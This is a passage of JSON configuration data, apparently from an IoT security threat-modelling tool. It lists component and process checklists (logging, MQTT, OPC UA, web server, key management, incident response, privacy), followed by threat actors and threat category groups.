users?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Stores Passwords Properly","ID":"984400a6-7bd6-4031-a40c-06f0499e0d86","Tooltip":"Are passwords stored properly (using a cryptographic hash function along with a unique unpredictable salt)?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Removes User Data on Reset","ID":"e6ee6f25-6e52-4f43-93c4-7ef35eb97024","Tooltip":"Does a factory reset remove all user data/credentials stored on the device?","HasGetter":false,"Editable":true,"Type":"Check Box"}]},{"ID":"02b94aae-efea-451e-a017-81be68db03d7","Name":"Log Management","Description":"","ComponentTypeID":1,"IsActive":true,"Properties":[{"DisplayName":"Complies to Data Protection Regulations","ID":"4006de15-8767-4a09-8678-84b8d6b50ae0","Tooltip":"Do all logged data comply with prevailing data protection regulations?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Restricts Access","ID":"8e4b2af8-b023-4991-80f5-54ffa28cd616","Tooltip":"Is access to log files restricted to the minimum required rights to function properly?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Implements Log Rotation","ID":"d0532ce9-51a9-4bb1-84ae-c8c63ee78e7f","Tooltip":"Is there a maximum size for logs and is log rotating implemented?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Evaluates Logs","ID":"364003cb-3e6c-470a-a6bf-e7a7c93e07fa","Tooltip":"Are logs regularly monitored and analyzed to extract valuable information and insight?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Stores Logs Separately","ID":"418fe90d-88fd-4066-9339-890501ea07f0","Tooltip":"Are logs stored in their own partition, separate from other system files?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Central Log Backup","ID":"bd32d10e-82d6-4e7f-9247-fe2753908e60","Tooltip":"Does the device securely send logs to a central repository? ","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Logs Passwords","ID":"025e828e-d1a0-4487-9c56-09fd6941d4b9","Tooltip":"Does the device log passwords?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Logs Authentication Attempts","ID":"c7d5fd7a-4007-480c-a34b-cb32fab17472","Tooltip":"Are authentication attempts logged?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Logs Changes in User Session","ID":"a154298a-d410-4da4-921d-906165cd5329","Tooltip":"Are user login, logout, and inactivity logged?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Logs Firmware Changes","ID":"91abf825-cfca-4386-b5d5-8262423b090d","Tooltip":"Are changes to the firmware logged?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Logs User Management Changes","ID":"1a582358-45c2-42e2-a21e-61206a4eda7e","Tooltip":"Are user management changes logged?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Logs Privilege Change","ID":"c86b6500-99cb-46e3-948f-b67b69c9768d","Tooltip":"Are privilege changes logged?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Logs Configuration Changes","ID":"0bd863c2-5505-4226-9b28-bab9715c99d1","Tooltip":"Are configuration changes logged?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Warns User of Full Log File","ID":"95b793b3-b68f-4533-9dc0-4e7d414effe3","Tooltip":"Are users notified when the log file reaches its maximum size?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Time Synchronization","ID":"8643278b-1ab3-4359-9ab9-f3911bf336e6","Tooltip":"Does the system provide the ability to synchronize the system time?","HasGetter":false,"Editable":true,"Type":"Check Box"}]},{"ID":"693eb3c8-9d8a-42ce-91aa-0ac4c190d7dc","Name":"MQTT Client","Description":"","ComponentTypeID":1,"IsThirdParty":true,"Properties":[{"DisplayName":"Uses TLS","ID":"6d7716ae-9870-46a1-9231-a713a0dcd5a0","Tooltip":"Are only messages on port 8883 sent (MQTT over TLS)?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Client Authentication","ID":"de628891-642c-4b7c-b88b-abf7988721dc","Tooltip":"Is the client authenticated and authorized using its own X.509 certificate?","HasGetter":false,"Editable":true,"Type":"Check Box"}]},{"ID":"c80fa1ff-def0-49b3-ad47-0c9f56c21fe6","Name":"OPC UA","Description":"","ComponentTypeID":1,"IsThirdParty":true,"Properties":[{"DisplayName":"HasSecureModel","ID":"4338e868-4e3c-4473-ba27-6148e8b1fc0f","Tooltip":"Is the security mode \'Sign\' or \'SignAndEncrypt\'?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"AuthenticatesUsers","ID":"1e3a8fb8-4a34-44be-8168-996a7e0283f1","Tooltip":"Are all users authenticated (identifier \'anonymous\' is not allowed)? ","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Uses Strong Crypto Algorithms","ID":"3f4c724d-3d4d-4b6b-9252-ef43b4240d79","Tooltip":"Is a strong security policy chosen that uses strong cryptographic algorithms?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Uses Certificates","ID":"34344cae-d072-4901-a7be-4084a2534b45","Tooltip":"Are only connections accepted that provide a trusted certificate?","HasGetter":false,"Editable":true,"Type":"Check Box"}]},{"ID":"fe464818-7cef-4aba-9d18-0bc2357ca56c","Name":"PROFINET","Description":"","ComponentTypeID":1,"IsThirdParty":true,"Properties":[]},{"ID":"2673ba36-ece0-462b-b115-0edb2c17828f","Name":"Modbus TCP","Description":"","ComponentTypeID":1,"IsThirdParty":true,"Properties":[]},{"ID":"ce3cdda1-0737-468e-83e7-ca20098551d1","Name":"Web Server","Description":"","ComponentTypeID":1,"IsThirdParty":true,"Properties":[{"DisplayName":"Uses Secure Protocols","ID":"9ea829dc-59d5-437c-8d24-9908feac2941","Tooltip":"Does the sever use secure protocols?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Uses Secure TLS","ID":"aa99758d-30a6-4e0f-9d11-1d46c0f43d6c","Tooltip":"Does the server use at least TLS 1.2 and older versions of SSL/TLS are disabled?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Server Version Banner","ID":"6faf97a0-6039-4b7b-ba7c-6b9ef003ede3","Tooltip":"Has the server a version banner?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Regular Patches","ID":"defc6bcc-2bc9-457a-abab-666ec78d4f73","Tooltip":"Is the sever regular updated and patched?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Web Application Firewall","ID":"6f65b93f-53ad-424f-a81b-4777ad48ec97","Tooltip":"Does the system deploy a web application firewall (WAF)?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Is API Monitoring","ID":"b125fa52-c06e-4e54-88b5-5e9d3929f643","Tooltip":"Are all API calls monitored for potential API misuse?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Runs on Root","ID":"39de06c5-7cfc-4fb8-8a1f-22a8888cf4ed","Tooltip":"Is the service running with root privileges?","HasGetter":false,"Editable":true,"Type":"Check Box"}]},{"ID":"a6659758-d5b9-47ab-961e-a77703652cf4","Name":"Mobile App API","Description":"","ComponentTypeID":1,"IsThirdParty":true,"Properties":[]},{"ID":"2ca79dc4-0a73-4fc2-859b-1b5701530183","Name":"User Application","Description":"","ComponentTypeID":1,"IsActive":false,"Properties":[{"DisplayName":"Follows Least Privilege Principal","ID":"03d7ff9f-bbdc-4938-974d-cd9766bdb8e0","Tooltip":"Does the application operate at the lowest privilege level that is possible, with access only to resources needed (least privilege principal)?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Is Isolated","ID":"532fc4c6-b14f-4b9a-b033-f4aaf0d63e25","Tooltip":"Is the application isolated from others, e.g. using sandboxing techniques such as virtual machines, containerisation, or hardware mechansims?  ","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Validates Input","ID":"1c1a93cf-acce-4f57-a210-e0b5058f57b8","Tooltip":"Is all data input sanitized and validated before processing?","HasGetter":false,"Editable":true,"Type":"Check Box"}]},{"ID":"2d746c06-a57d-41af-9712-f9d8059425eb","Name":"Debugging","Description":"","ComponentTypeID":1,"IsActive":true,"Properties":[{"DisplayName":"Has Improper Access Control","ID":"f40ce61a-c823-4ca7-ab51-a70dbd9718a6","Tooltip":"","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Exposes Internal Assets","ID":"517b62dd-eea7-426e-82c6-2c458eed0aaf","Tooltip":"","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Unpublished Interface","ID":"311904f3-7898-4bab-ba74-e6024c704cd3","Tooltip":"Are the hidden interfaces that developers created with the intend to be not publicly available?","HasGetter":false,"Editable":true,"Type":"Check Box"}]},{"ID":"6c83ccbc-ffbd-4bd6-b207-07386e3393c5","Name":"Hardware Abstraction","Description":"","ComponentTypeID":1,"IsActive":true,"Properties":[{"DisplayName":"Has Hardware Feature Restriction","ID":"4d88ce07-2a06-4ae3-942a-46eb25ccdd9b","Tooltip":"","HasGetter":false,"Editable":true,"Type":"Check Box"}]},{"ID":"ea189855-6883-489f-a3d0-77d4ac51a6ef","Name":"Memory Management","Description":"","ComponentTypeID":1,"IsActive":true,"Properties":[{"DisplayName":"Allows Address Region Overlap","ID":"ca6a9224-153b-4c06-8c1b-4ea3333c8e92","Tooltip":"","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Clears Data on State Transition","ID":"16ab50f4-dd94-43dd-8480-37cae5c61043","Tooltip":"","HasGetter":false,"Editable":true,"Type":"Check Box"}]},{"ID":"463570ce-8495-4b4b-97fe-abed4942059a","Name":"Key Management","Description":"https://cheatsheetseries.owasp.org/cheatsheets/Key_Management_Cheat_Sheet.html#key-management-lifecycle-best-practices","Properties":[{"DisplayName":"Stores Keys in Security Module ","ID":"64bb2754-a187-47c8-aa93-e599f0a97a57","Tooltip":"Are keys stored in a cryptographic vault, such as a trusted platform module (TPM), secure element (SE), or hardware security module (HSM)? ","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Key Used In Trusted Environment","ID":"b43ada71-51c6-4f5e-b310-a1735a41e602","Tooltip":"Are cryptographic operations (such as key access, encryption, and signing) executed in a trusted environment (e.g. separate module)?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Encrypts Keys","ID":"b6c0efb3-7db3-4dd8-8c60-620027eefa3e","Tooltip":"Are keys encrypted using a key encryption key (KEK)? ","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Verifies Certificate Chain","ID":"20b12b0e-4031-4eb3-ad39-f91489884490","Tooltip":"Is the entire certificate chain validated before trusting a certificate?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Enables Certificate Update","ID":"e09bd987-fbf4-4f3d-afeb-033e5bdcb7f8","Tooltip":"Is there a secure and reliable way to update certificates?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Enables Certificate Revocation","ID":"c9d634b6-7eb8-4210-9e97-58e93a5c09a0","Tooltip":"Is it possible to revoke a certificate / check a certificate against a revocation list?","HasGetter":false,"Editable":true,"Type":"Check Box"}],"ComponentTypeID":1,"IsActive":true},{"ID":"aa2ca59f-4045-4cb4-a25d-b23c4b456be5","Name":"WebSocket","Description":"https://devcenter.heroku.com/articles/websocket-security\\nhttps://brightsec.com/blog/websocket-security-top-vulnerabilities/","Properties":[{"DisplayName":"Uses WSS","ID":"cb908fd2-f59c-4f56-ac91-bc1192df5af0","Tooltip":"Is the secure wss:// protocol used over the unsecure ws:// protocol?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Is Tunneled","ID":"0d2c8df9-271f-42e2-b3fe-cb74719ff39b","Tooltip":"Is the connection tunneled to any other service (e.g. a database)?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Validates Client Input","ID":"8cd86481-a82f-490d-8d62-2195981779e9","Tooltip":"Is client data validated before processing on the server?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Validates Server Data","ID":"92c3d3ef-aa2d-4920-978e-ff1755479308","Tooltip":"Is server data validated and parsed before processing on the client?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Implements Authentication","ID":"485ff476-0c99-41de-b90a-4fdd27730685","Tooltip":"Is authentication and authorization handled separately (e.g. ticket-based)? ","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Limits Connections","ID":"9616fd88-1e3d-4d72-9178-ad81d793a744","Tooltip":"Is the number of connections limited?","HasGetter":false,"Editable":true,"Type":"Check Box"}],"ComponentTypeID":1,"IsActive":false,"IsThirdParty":true}],"myComponentSWTypeGroups":[{"ID":"c91d3152-cf81-44d2-b65c-b9ab2cc0f8f9","Name":"Core","Description":"","myComponentTypeIDs":["551ef8ab-1707-4d4c-9845-c8dcc7515fe9","75752ec0-7fa9-41a9-a06a-edcf890ca569","ca502567-bafc-40f9-a5e4-8ce94780c3f6","9926788f-c85e-43ca-91e4-aa9c0f46656e","2d746c06-a57d-41af-9712-f9d8059425eb","6c83ccbc-ffbd-4bd6-b207-07386e3393c5","ea189855-6883-489f-a3d0-77d4ac51a6ef"],"ComponentTypeID":1},{"ID":"4845aa7b-55f5-44e5-9187-ac53964300d9","Name":"Base","Description":"","myComponentTypeIDs":["838f741c-120e-4b73-951a-d55a11d36ca4","f049724d-ed42-4c16-af4e-9bcacffc7f0b","44545d3e-fa0a-44c7-a19e-8164dab646dc","463570ce-8495-4b4b-97fe-abed4942059a","7e64d98b-ecbe-4921-9545-8b30d0f9bde8","02b94aae-efea-451e-a017-81be68db03d7"],"ComponentTypeID":1},{"ID":"af7ed765-9e95-4a90-8764-cdd33826003f","Name":"Connectivity","Description":"","myComponentTypeIDs":["693eb3c8-9d8a-42ce-91aa-0ac4c190d7dc","c80fa1ff-def0-49b3-ad47-0c9f56c21fe6","fe464818-7cef-4aba-9d18-0bc2357ca56c","2673ba36-ece0-462b-b115-0edb2c17828f","aa2ca59f-4045-4cb4-a25d-b23c4b456be5"],"ComponentTypeID":1},{"ID":"9a10995f-e765-487a-b357-51e22d7e5f6b","Name":"App","Description":"","myComponentTypeIDs":["ce3cdda1-0737-468e-83e7-ca20098551d1","a6659758-d5b9-47ab-961e-a77703652cf4","2ca79dc4-0a73-4fc2-859b-1b5701530183"],"ComponentTypeID":1}],"myComponentPTypes":[{"ID":"25032887-439e-4599-84bf-05d906641a0b","Name":"Incident Response","Description":"See IoT Security Foundation: Vulnerability Disclosure","ComponentTypeID":2,"IsActive":true,"Properties":[{"DisplayName":"Has Vulnerability Disclosure","ID":"dd2c4c41-45f0-4105-aea4-317943e2f435","Tooltip":"Does the manufacturer enable a coordinated vulnerability disclosure?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Bug Bounty Program","ID":"b4c47f35-bcd3-4b18-9b35-8a7f213dcca4","Tooltip":"Is there a bug bounty program?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Provide Timeline Info","ID":"e7d90cc4-822e-4aab-a161-c766cf13df22","Tooltip":"Is there information on the timelines for acknowledgement and resolution of reported issues?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Incident Response Team","ID":"263b5363-2c09-45dd-8ff8-1a430fb7e93a","Tooltip":"Is there a incident response team within the organization?","HasGetter":false,"Editable":true,"Type":"Check Box"}]},{"ID":"cdcdd88c-7ec2-4b18-8d72-bcb0e402ca5d","Name":"Update and Patch Management","Description":"","Properties":[{"DisplayName":"Has End of Support Date","ID":"ec622fb4-b851-4c4f-94dc-d5f5b1a6f85d","Tooltip":"Is there a publicly available date for the end of support?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Update Interval Information","ID":"53ceef04-26a6-46a6-834d-bb9c0df2a24d","Tooltip":"Is a rough update interval publicly available for customers?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Update Notification Process","ID":"7da73f3c-b3f6-4d35-ae19-c60ed655b14c","Tooltip":"If updates are not applied automatically: is there a process for notifying customers about a new update?","HasGetter":false,"Editable":true,"Type":"Check Box"}],"ComponentTypeID":2,"IsActive":true},{"ID":"8902950a-6c5e-426b-baa2-71794e74f720","Name":"Penetration Testing","Description":"","Properties":[{"DisplayName":"Has Regular Pentests","ID":"d4cb3498-4689-49f2-9f37-8bd45e62a972","Tooltip":"Are penetration tests regularly (at least annually) performed?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has External Audits","ID":"5f7c116c-e2a5-49af-bfd6-9c38541b6a77","Tooltip":"Are audits regularly performed by external institutes?","HasGetter":false,"Editable":true,"Type":"Check Box"}],"ComponentTypeID":2,"IsActive":true},{"ID":"8aa599b0-9ee2-474f-974b-bbefa09896bd","Name":"Incident Detection","Description":"","Properties":[{"DisplayName":"Has Reporting System","ID":"23943ca9-3df9-4d69-a414-6d8fef99d30c","Tooltip":"Is there a public vulnerability reporting system?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has /security Page","ID":"36e1de4b-5129-470f-b06d-208ef7610da8","Tooltip":"Does the website of the manufacturer use /security to provide security-related topics?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Security.txt","ID":"3affc4da-9a78-43ec-990b-75d20edbc410","Tooltip":"Does the website of the manufacturer provide a security.txt including all security-related sites and contact information?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Contact Email Address","ID":"d94f2535-73f9-4c2d-aef1-57b1c9daaa5c","Tooltip":"Does the manufacturer provide an email account for security related topics?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Public Policy","ID":"0c7bdef9-6b56-42db-a22b-a460b08bb27d","Tooltip":"Is there are publicly available vulnerability disclosure policy?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has PGP Key","ID":"61d4b9c9-19a9-431e-b114-f2c04b48846b","Tooltip":"Does the manufacturer provide a PGP on their website for secure communication?","HasGetter":false,"Editable":true,"Type":"Check Box"}],"ComponentTypeID":2,"IsActive":true},{"ID":"44fd3f80-7e55-41af-b452-283556dd1894","Name":"Privacy Considerations","Description":"","Properties":[{"DisplayName":"Has PIA","ID":"8f4a0dd3-2083-42eb-89bd-48480a082342","Tooltip":"Is a privacy impact assessment conducted?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Regular PIA Update","ID":"f3d756ae-7451-4738-986c-0e15d22cb2b2","Tooltip":"Is the privacy impact assessment regularly updated (e.g. annually)?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Privacy Measures","ID":"2a4c8bb7-bd16-4eee-847f-25090eac2d7e","Tooltip":"Are appropriate technical and operational measures (e. g. data pseudoymisation, data minimisation) implemented?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Compliant with Law","ID":"1bd8c924-5f59-42db-a9b2-a4527c46adf2","Tooltip":"Does the system comply with all privacy laws that govern user control over their personal data?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Protects User Rights","ID":"e79dc2a3-1af9-4a37-b649-9db68eacfc9f","Tooltip":"Does the system implement appropriate technical and operational measures for the protection of users rights and freedoms (e. g. transparent information, right of access, right to erasure)?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Sufficient User Awareness","ID":"2dd7688c-eddf-4cfa-a496-8c1a46963c89","Tooltip":"Are users sufficiently aware what personal data is being exposed to the manufacturer, operator, and other partner organisations?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Opt-In Mechansim","ID":"d9b40dd2-e5eb-485d-9cf5-db2ac441c899","Tooltip":"Does the system implement an opt-int mechanism to get explicit user consent for personal data processing?","HasGetter":false,"Editable":true,"Type":"Check Box"}],"ComponentTypeID":2,"IsActive":true},{"ID":"be1f1524-fd62-4957-a08d-844b070dbb00","Name":"Safety Impact Assessment","Description":"Evaluate the safety impacts of an IoT system, log all safety risks, prioritize the risks, and implement mitigations for each risk. Incorporate device and environmental controls to enforce safety requirements, as necessary.","Properties":[{"DisplayName":"Has SIA","ID":"a1e7923f-848d-4532-b967-700925af1a77","Tooltip":"Is a safety impact assessment conducted?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Fault Tree Analysis","ID":"d0e4fa19-2b29-48b3-b81b-2be909af26d8","Tooltip":"Is a fault tree analysis conducted?","HasGetter":false,"Editable":true,"Type":"Check Box"}],"ComponentTypeID":2,"IsActive":true},{"ID":"23a8870f-e7f4-4e07-80be-8cb890f509e8","Name":"Identity and Access Management","Description":"","Properties":[{"DisplayName":"Has Account Management","ID":"524e227d-483e-45ae-b002-3041d15fe7e9","Tooltip":"Is there a regular audit of the account management (user, administrator, etc.)?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Certificate-based Authentication","ID":"330a4f44-1471-460d-889f-4f33a3b8ce72","Tooltip":"Is certificate-based authentication used to access the system?","HasGetter":false,"Editable":true,"Type":"Check Box"}],"ComponentTypeID":2,"IsActive":true},{"ID":"34f3948e-4d7f-4f0b-a86b-e649c427bc8e","Name":"Certificate Management","Description":"","Properties":[{"DisplayName":"Uses Short-dated Certificates ","ID":"40c05808-37a1-4394-a9d5-8491b55c3a9b","Tooltip":"Is the lifetime of operational certificates no longer than 3 years?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Revocation Process","ID":"083e93ef-da95-4064-a698-6fbd5cf997f5","Tooltip":"Is there a process for certificate revocation?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Management Policy","ID":"46d35b81-19e3-404e-9fe2-af5088971ffe","Tooltip":"Is there a certificate management policy (creation, processing, storage, etc.)?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Automated Renewal Process","ID":"0c0d40fd-7f0a-412d-ae80-efce58906308","Tooltip":"Is there an automated process to renew certificates?","HasGetter":false,"Editable":true,"Type":"Check Box"}],"ComponentTypeID":2,"IsActive":true},{"ID":"2c884e0a-ab3c-43f7-95c7-f4a320e8bbe1","Name":"Supply Chain Risk Management","Description":"","Properties":[{"DisplayName":"Has SCRM Program","ID":"7e3faca4-9b7a-4f8e-8fbe-cb461ca6870f","Tooltip":"Is there a established supply chain risk management program?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Third Party Monitoring","ID":"2614fc88-29cb-4d84-9902-5f7ca7f98410","Tooltip":"Are third party components (hardware, software) tracked, monitored, and regularly updated?","HasGetter":false,"Editable":true,"Type":"Check Box"}],"ComponentTypeID":2,"IsActive":true},{"ID":"ea8af3ca-0055-4d82-88af-711b356aec74","Name":"Secure Development","Description":"","Properties":[{"DisplayName":"Has SDL Program","ID":"e1cdca4d-c2a2-48a1-be0e-93af41cd458c","Tooltip":"Is a Secure Development Plan (SDL) implemented (e.g. based on ISO/IEC 27034)?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Responsible Person For Reg. Compliance","ID":"9db73879-4ec7-46ae-a8d9-1b555aac6954","Tooltip":"Do you have a group and organization responsible for regulatory compliance of security, privacy and data protection, and safety? ","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Responsible Person For Security Compliance","ID":"f3a7b4b7-2ff8-45e8-be0e-321f8d9304a1","Tooltip":"Do you have a group responsible for security compliance and quality control?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Responsible Person For Auditing","ID":"8fda48d4-746b-4915-b0d2-55c9b68fbd99","Tooltip":"Do you have a responsible group for auditing?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Includes Testing","ID":"e6f155e1-51e1-4297-80d9-a6a3beef3657","Tooltip":"Does your SDL program include internal functional and security testing of the system?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Employee Training","ID":"976c15a1-9170-4a2b-a41c-f1dfb4688b1e","Tooltip":"Is there a holistic security training and awareness program for employees?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Regular Employee Training","ID":"f2e2201c-bd33-4dbd-a8ca-1f3a6d16eb9f","Tooltip":"Is there a continuous, regular and frequently security training for employees? ","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Secure Coding Guidelines","ID":"60fadd09-661b-494a-bcac-f0a652172a50","Tooltip":"Are secure coding guidelines implemented?","HasGetter":false,"Editable":true,"Type":"Check Box"}],"ComponentTypeID":2,"IsActive":true}],"myComponentPTypeGroups":[{"ID":"152dc4f8-0f67-4967-bb95-0994a48082f3","Name":"Design & Implementation","Description":"","myComponentTypeIDs":["ea8af3ca-0055-4d82-88af-711b356aec74","44fd3f80-7e55-41af-b452-283556dd1894","be1f1524-fd62-4957-a08d-844b070dbb00","2c884e0a-ab3c-43f7-95c7-f4a320e8bbe1"],"ComponentTypeID":2},{"ID":"d6257d70-4fbd-41a5-92d2-7dd7be9e447c","Name":"Security Management","Description":"","myComponentTypeIDs":["23a8870f-e7f4-4e07-80be-8cb890f509e8","34f3948e-4d7f-4f0b-a86b-e649c427bc8e"],"ComponentTypeID":2},{"ID":"a867f0e6-c920-4b9f-a6a9-0947780695b0","Name":"Update Management","Description":"","myComponentTypeIDs":["cdcdd88c-7ec2-4b18-8d72-bcb0e402ca5d"],"ComponentTypeID":2},{"ID":"55e4ff75-c735-40ef-a97d-031f4df2d4ec","Name":"Incident Management","Description":"","myComponentTypeIDs":["8aa599b0-9ee2-474f-974b-bbefa09896bd","25032887-439e-4599-84bf-05d906641a0b"],"ComponentTypeID":2},{"ID":"534fe08c-c722-40b6-b7d6-ed5deee2eebc","Name":"Security Verification","Description":"","myComponentTypeIDs":["8902950a-6c5e-426b-baa2-71794e74f720"],"ComponentTypeID":2}],"threatActors":[{"ID":"09ec9afa-906e-4383-be80-47de5c87bd4d","Name":"Cyber criminals","Description":"","Likelihood":2,"Motive":["Blackmail the victim to get money"],"Capabilities":[]},{"ID":"90cc276e-cfc5-4e37-afa0-b14f96f2d231","Name":"State-sponsored actors","Description":"","Likelihood":2,"Motive":["Citizen espionage","Disruption of critical infrastructures"],"Capabilities":[]},{"ID":"b5ee94b3-703f-4cdd-92bd-64bd73975cb8","Name":"Competitors","Description":"","Likelihood":2,"Motive":["Know-how theft"],"Capabilities":[]},{"ID":"127b2c1d-e8c5-4225-a03f-7169cceab3a9","Name":"Insiders / employees","Description":"","Likelihood":2,"Motive":["Financial gain","Anger"],"Capabilities":[]},{"ID":"445bb063-8765-4224-8c44-86b8c38d16e0","Name":"Hacktivists","Description":"","Likelihood":2,"Motive":[],"Capabilities":[]},{"ID":"d8135bb6-9891-4038-9fe8-707c9426b42b","Name":"Terrorists","Description":"","Likelihood":2,"Motive":[],"Capabilities":[]},{"ID":"b334caef-05f2-417f-a664-6a56ea83657d","Name":"Script kiddies","Description":"","Likelihood":2,"Motive":[],"Capabilities":[]}],"threatCategoryGroups":[{"ID":"9d6172db-e842-48e9-bb18-6137a6ae60ee","Name":"Nefarious Activity / Abuse / Misuse","Description":"","threatCategorieIDs":["2dcb00d0-d8a3-4dbc-9efa-d33783a8106b","f19e41bd-9fd9-4046-a195-28d441207fa0","b869918c-0b47-45c3-8fab-0b698043aa66","c0bd6e2f-9784-4c11-9aee-115a966e0a4d","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","6de4f75a-bc96-4f32-b18f-867eac0e8fda","9e715340-1a69-47df-864a-7c3b5a9a678e","4f5e6bf4-c9c4-4ea6-9b0e-5c861570e6ec","c17cbe5c-3210-42fc-be1e-05f1f915865b"]},{"ID":"415f75e3-24f1-4d5f-9e0b-9e66b134d728","Name":"Attack Preparation / Persistence","Description":"","threatCategorieIDs":["c46b7c74-5979-409d-8ceb-631b8833c596","c8a14b27-b13f-4358-9f3f-691d01c97c77","b1ff0675-f9b7-4ffb-bdd5-f621c6580d9a"]},{"ID":"08340ecc-e53f-4ab6-8573-af18bcce9e92","Name":"Damage / Destruction / Harm / Loss","Description":"","threatCategorieIDs":["88d19822-b1b0-469f-ae00-1bc600ccaa1d","644f8521-6b49-41bc-86df-4064b89fb881","96bdc11d-dbb0-4785-8a5c-373e2c492eb0","3915215b-3414-4b2e-8446-9763398790ec","a6a57921-7fcb-4f54-b0f5-bac0a0f74163","bc4b439c-6197-48d3-a308-7fd323d2ea5e","6b8c08cb-3f02-413a-96b4-179bb1f67997","4d0bb854-2843-4d47-8b2c-043f7b8e4b4f","08d8fbba-5de4-4538-8674-43e214c3ebad"]},{"ID":"d44618e3-6f7e-48bd-ba5d-9cef76e4de29","Name":"Espionage / Interception / Tampering","Description":"","threatCategorieIDs":["8a3d81d9-3317-4e5d-88fe-a0e0592295fe","d0bcd70c-fbad-4a16-a606-8b0682ae7afe","61d04f2d-83b1-4152-9aba-4ad188eef06d","f7639a0c-e85b-4947-bbec-2ac4a0911827"]},{"ID":"8cc887d4-ac13-4e73-a683-9ce3f7d108a2","Name":"Intellectual Property Theft","Description":"","threatCategorieIDs":["ddf75d3c-ac5a-4ca2-8268-a4f7b40add7d","70d07015-4eda-4d1a-8d07-1791f881f8f0","2e50cdf4-cc94-4a32-98ee-825028a1f476"]},{"ID":"2c19e683-971c-4389-bf96-3963e6a1dd56","Name":"Legal","Description":"","threatCategorieIDs":["3bdf3019-02dd-4c7f-bffc-90189b39e6a7","180a9034-735c-44ca-a96a-693cb48ffaa7","1180824d-9f8a-4a4a-8398-3775c541a360","647ed950-8b8a-4a3f-b3f0-d9967c7d218f"]},{"ID":"6fb5aeac-180b-4ed5-b246-ad888cfd91aa","Name":"Malfunction / 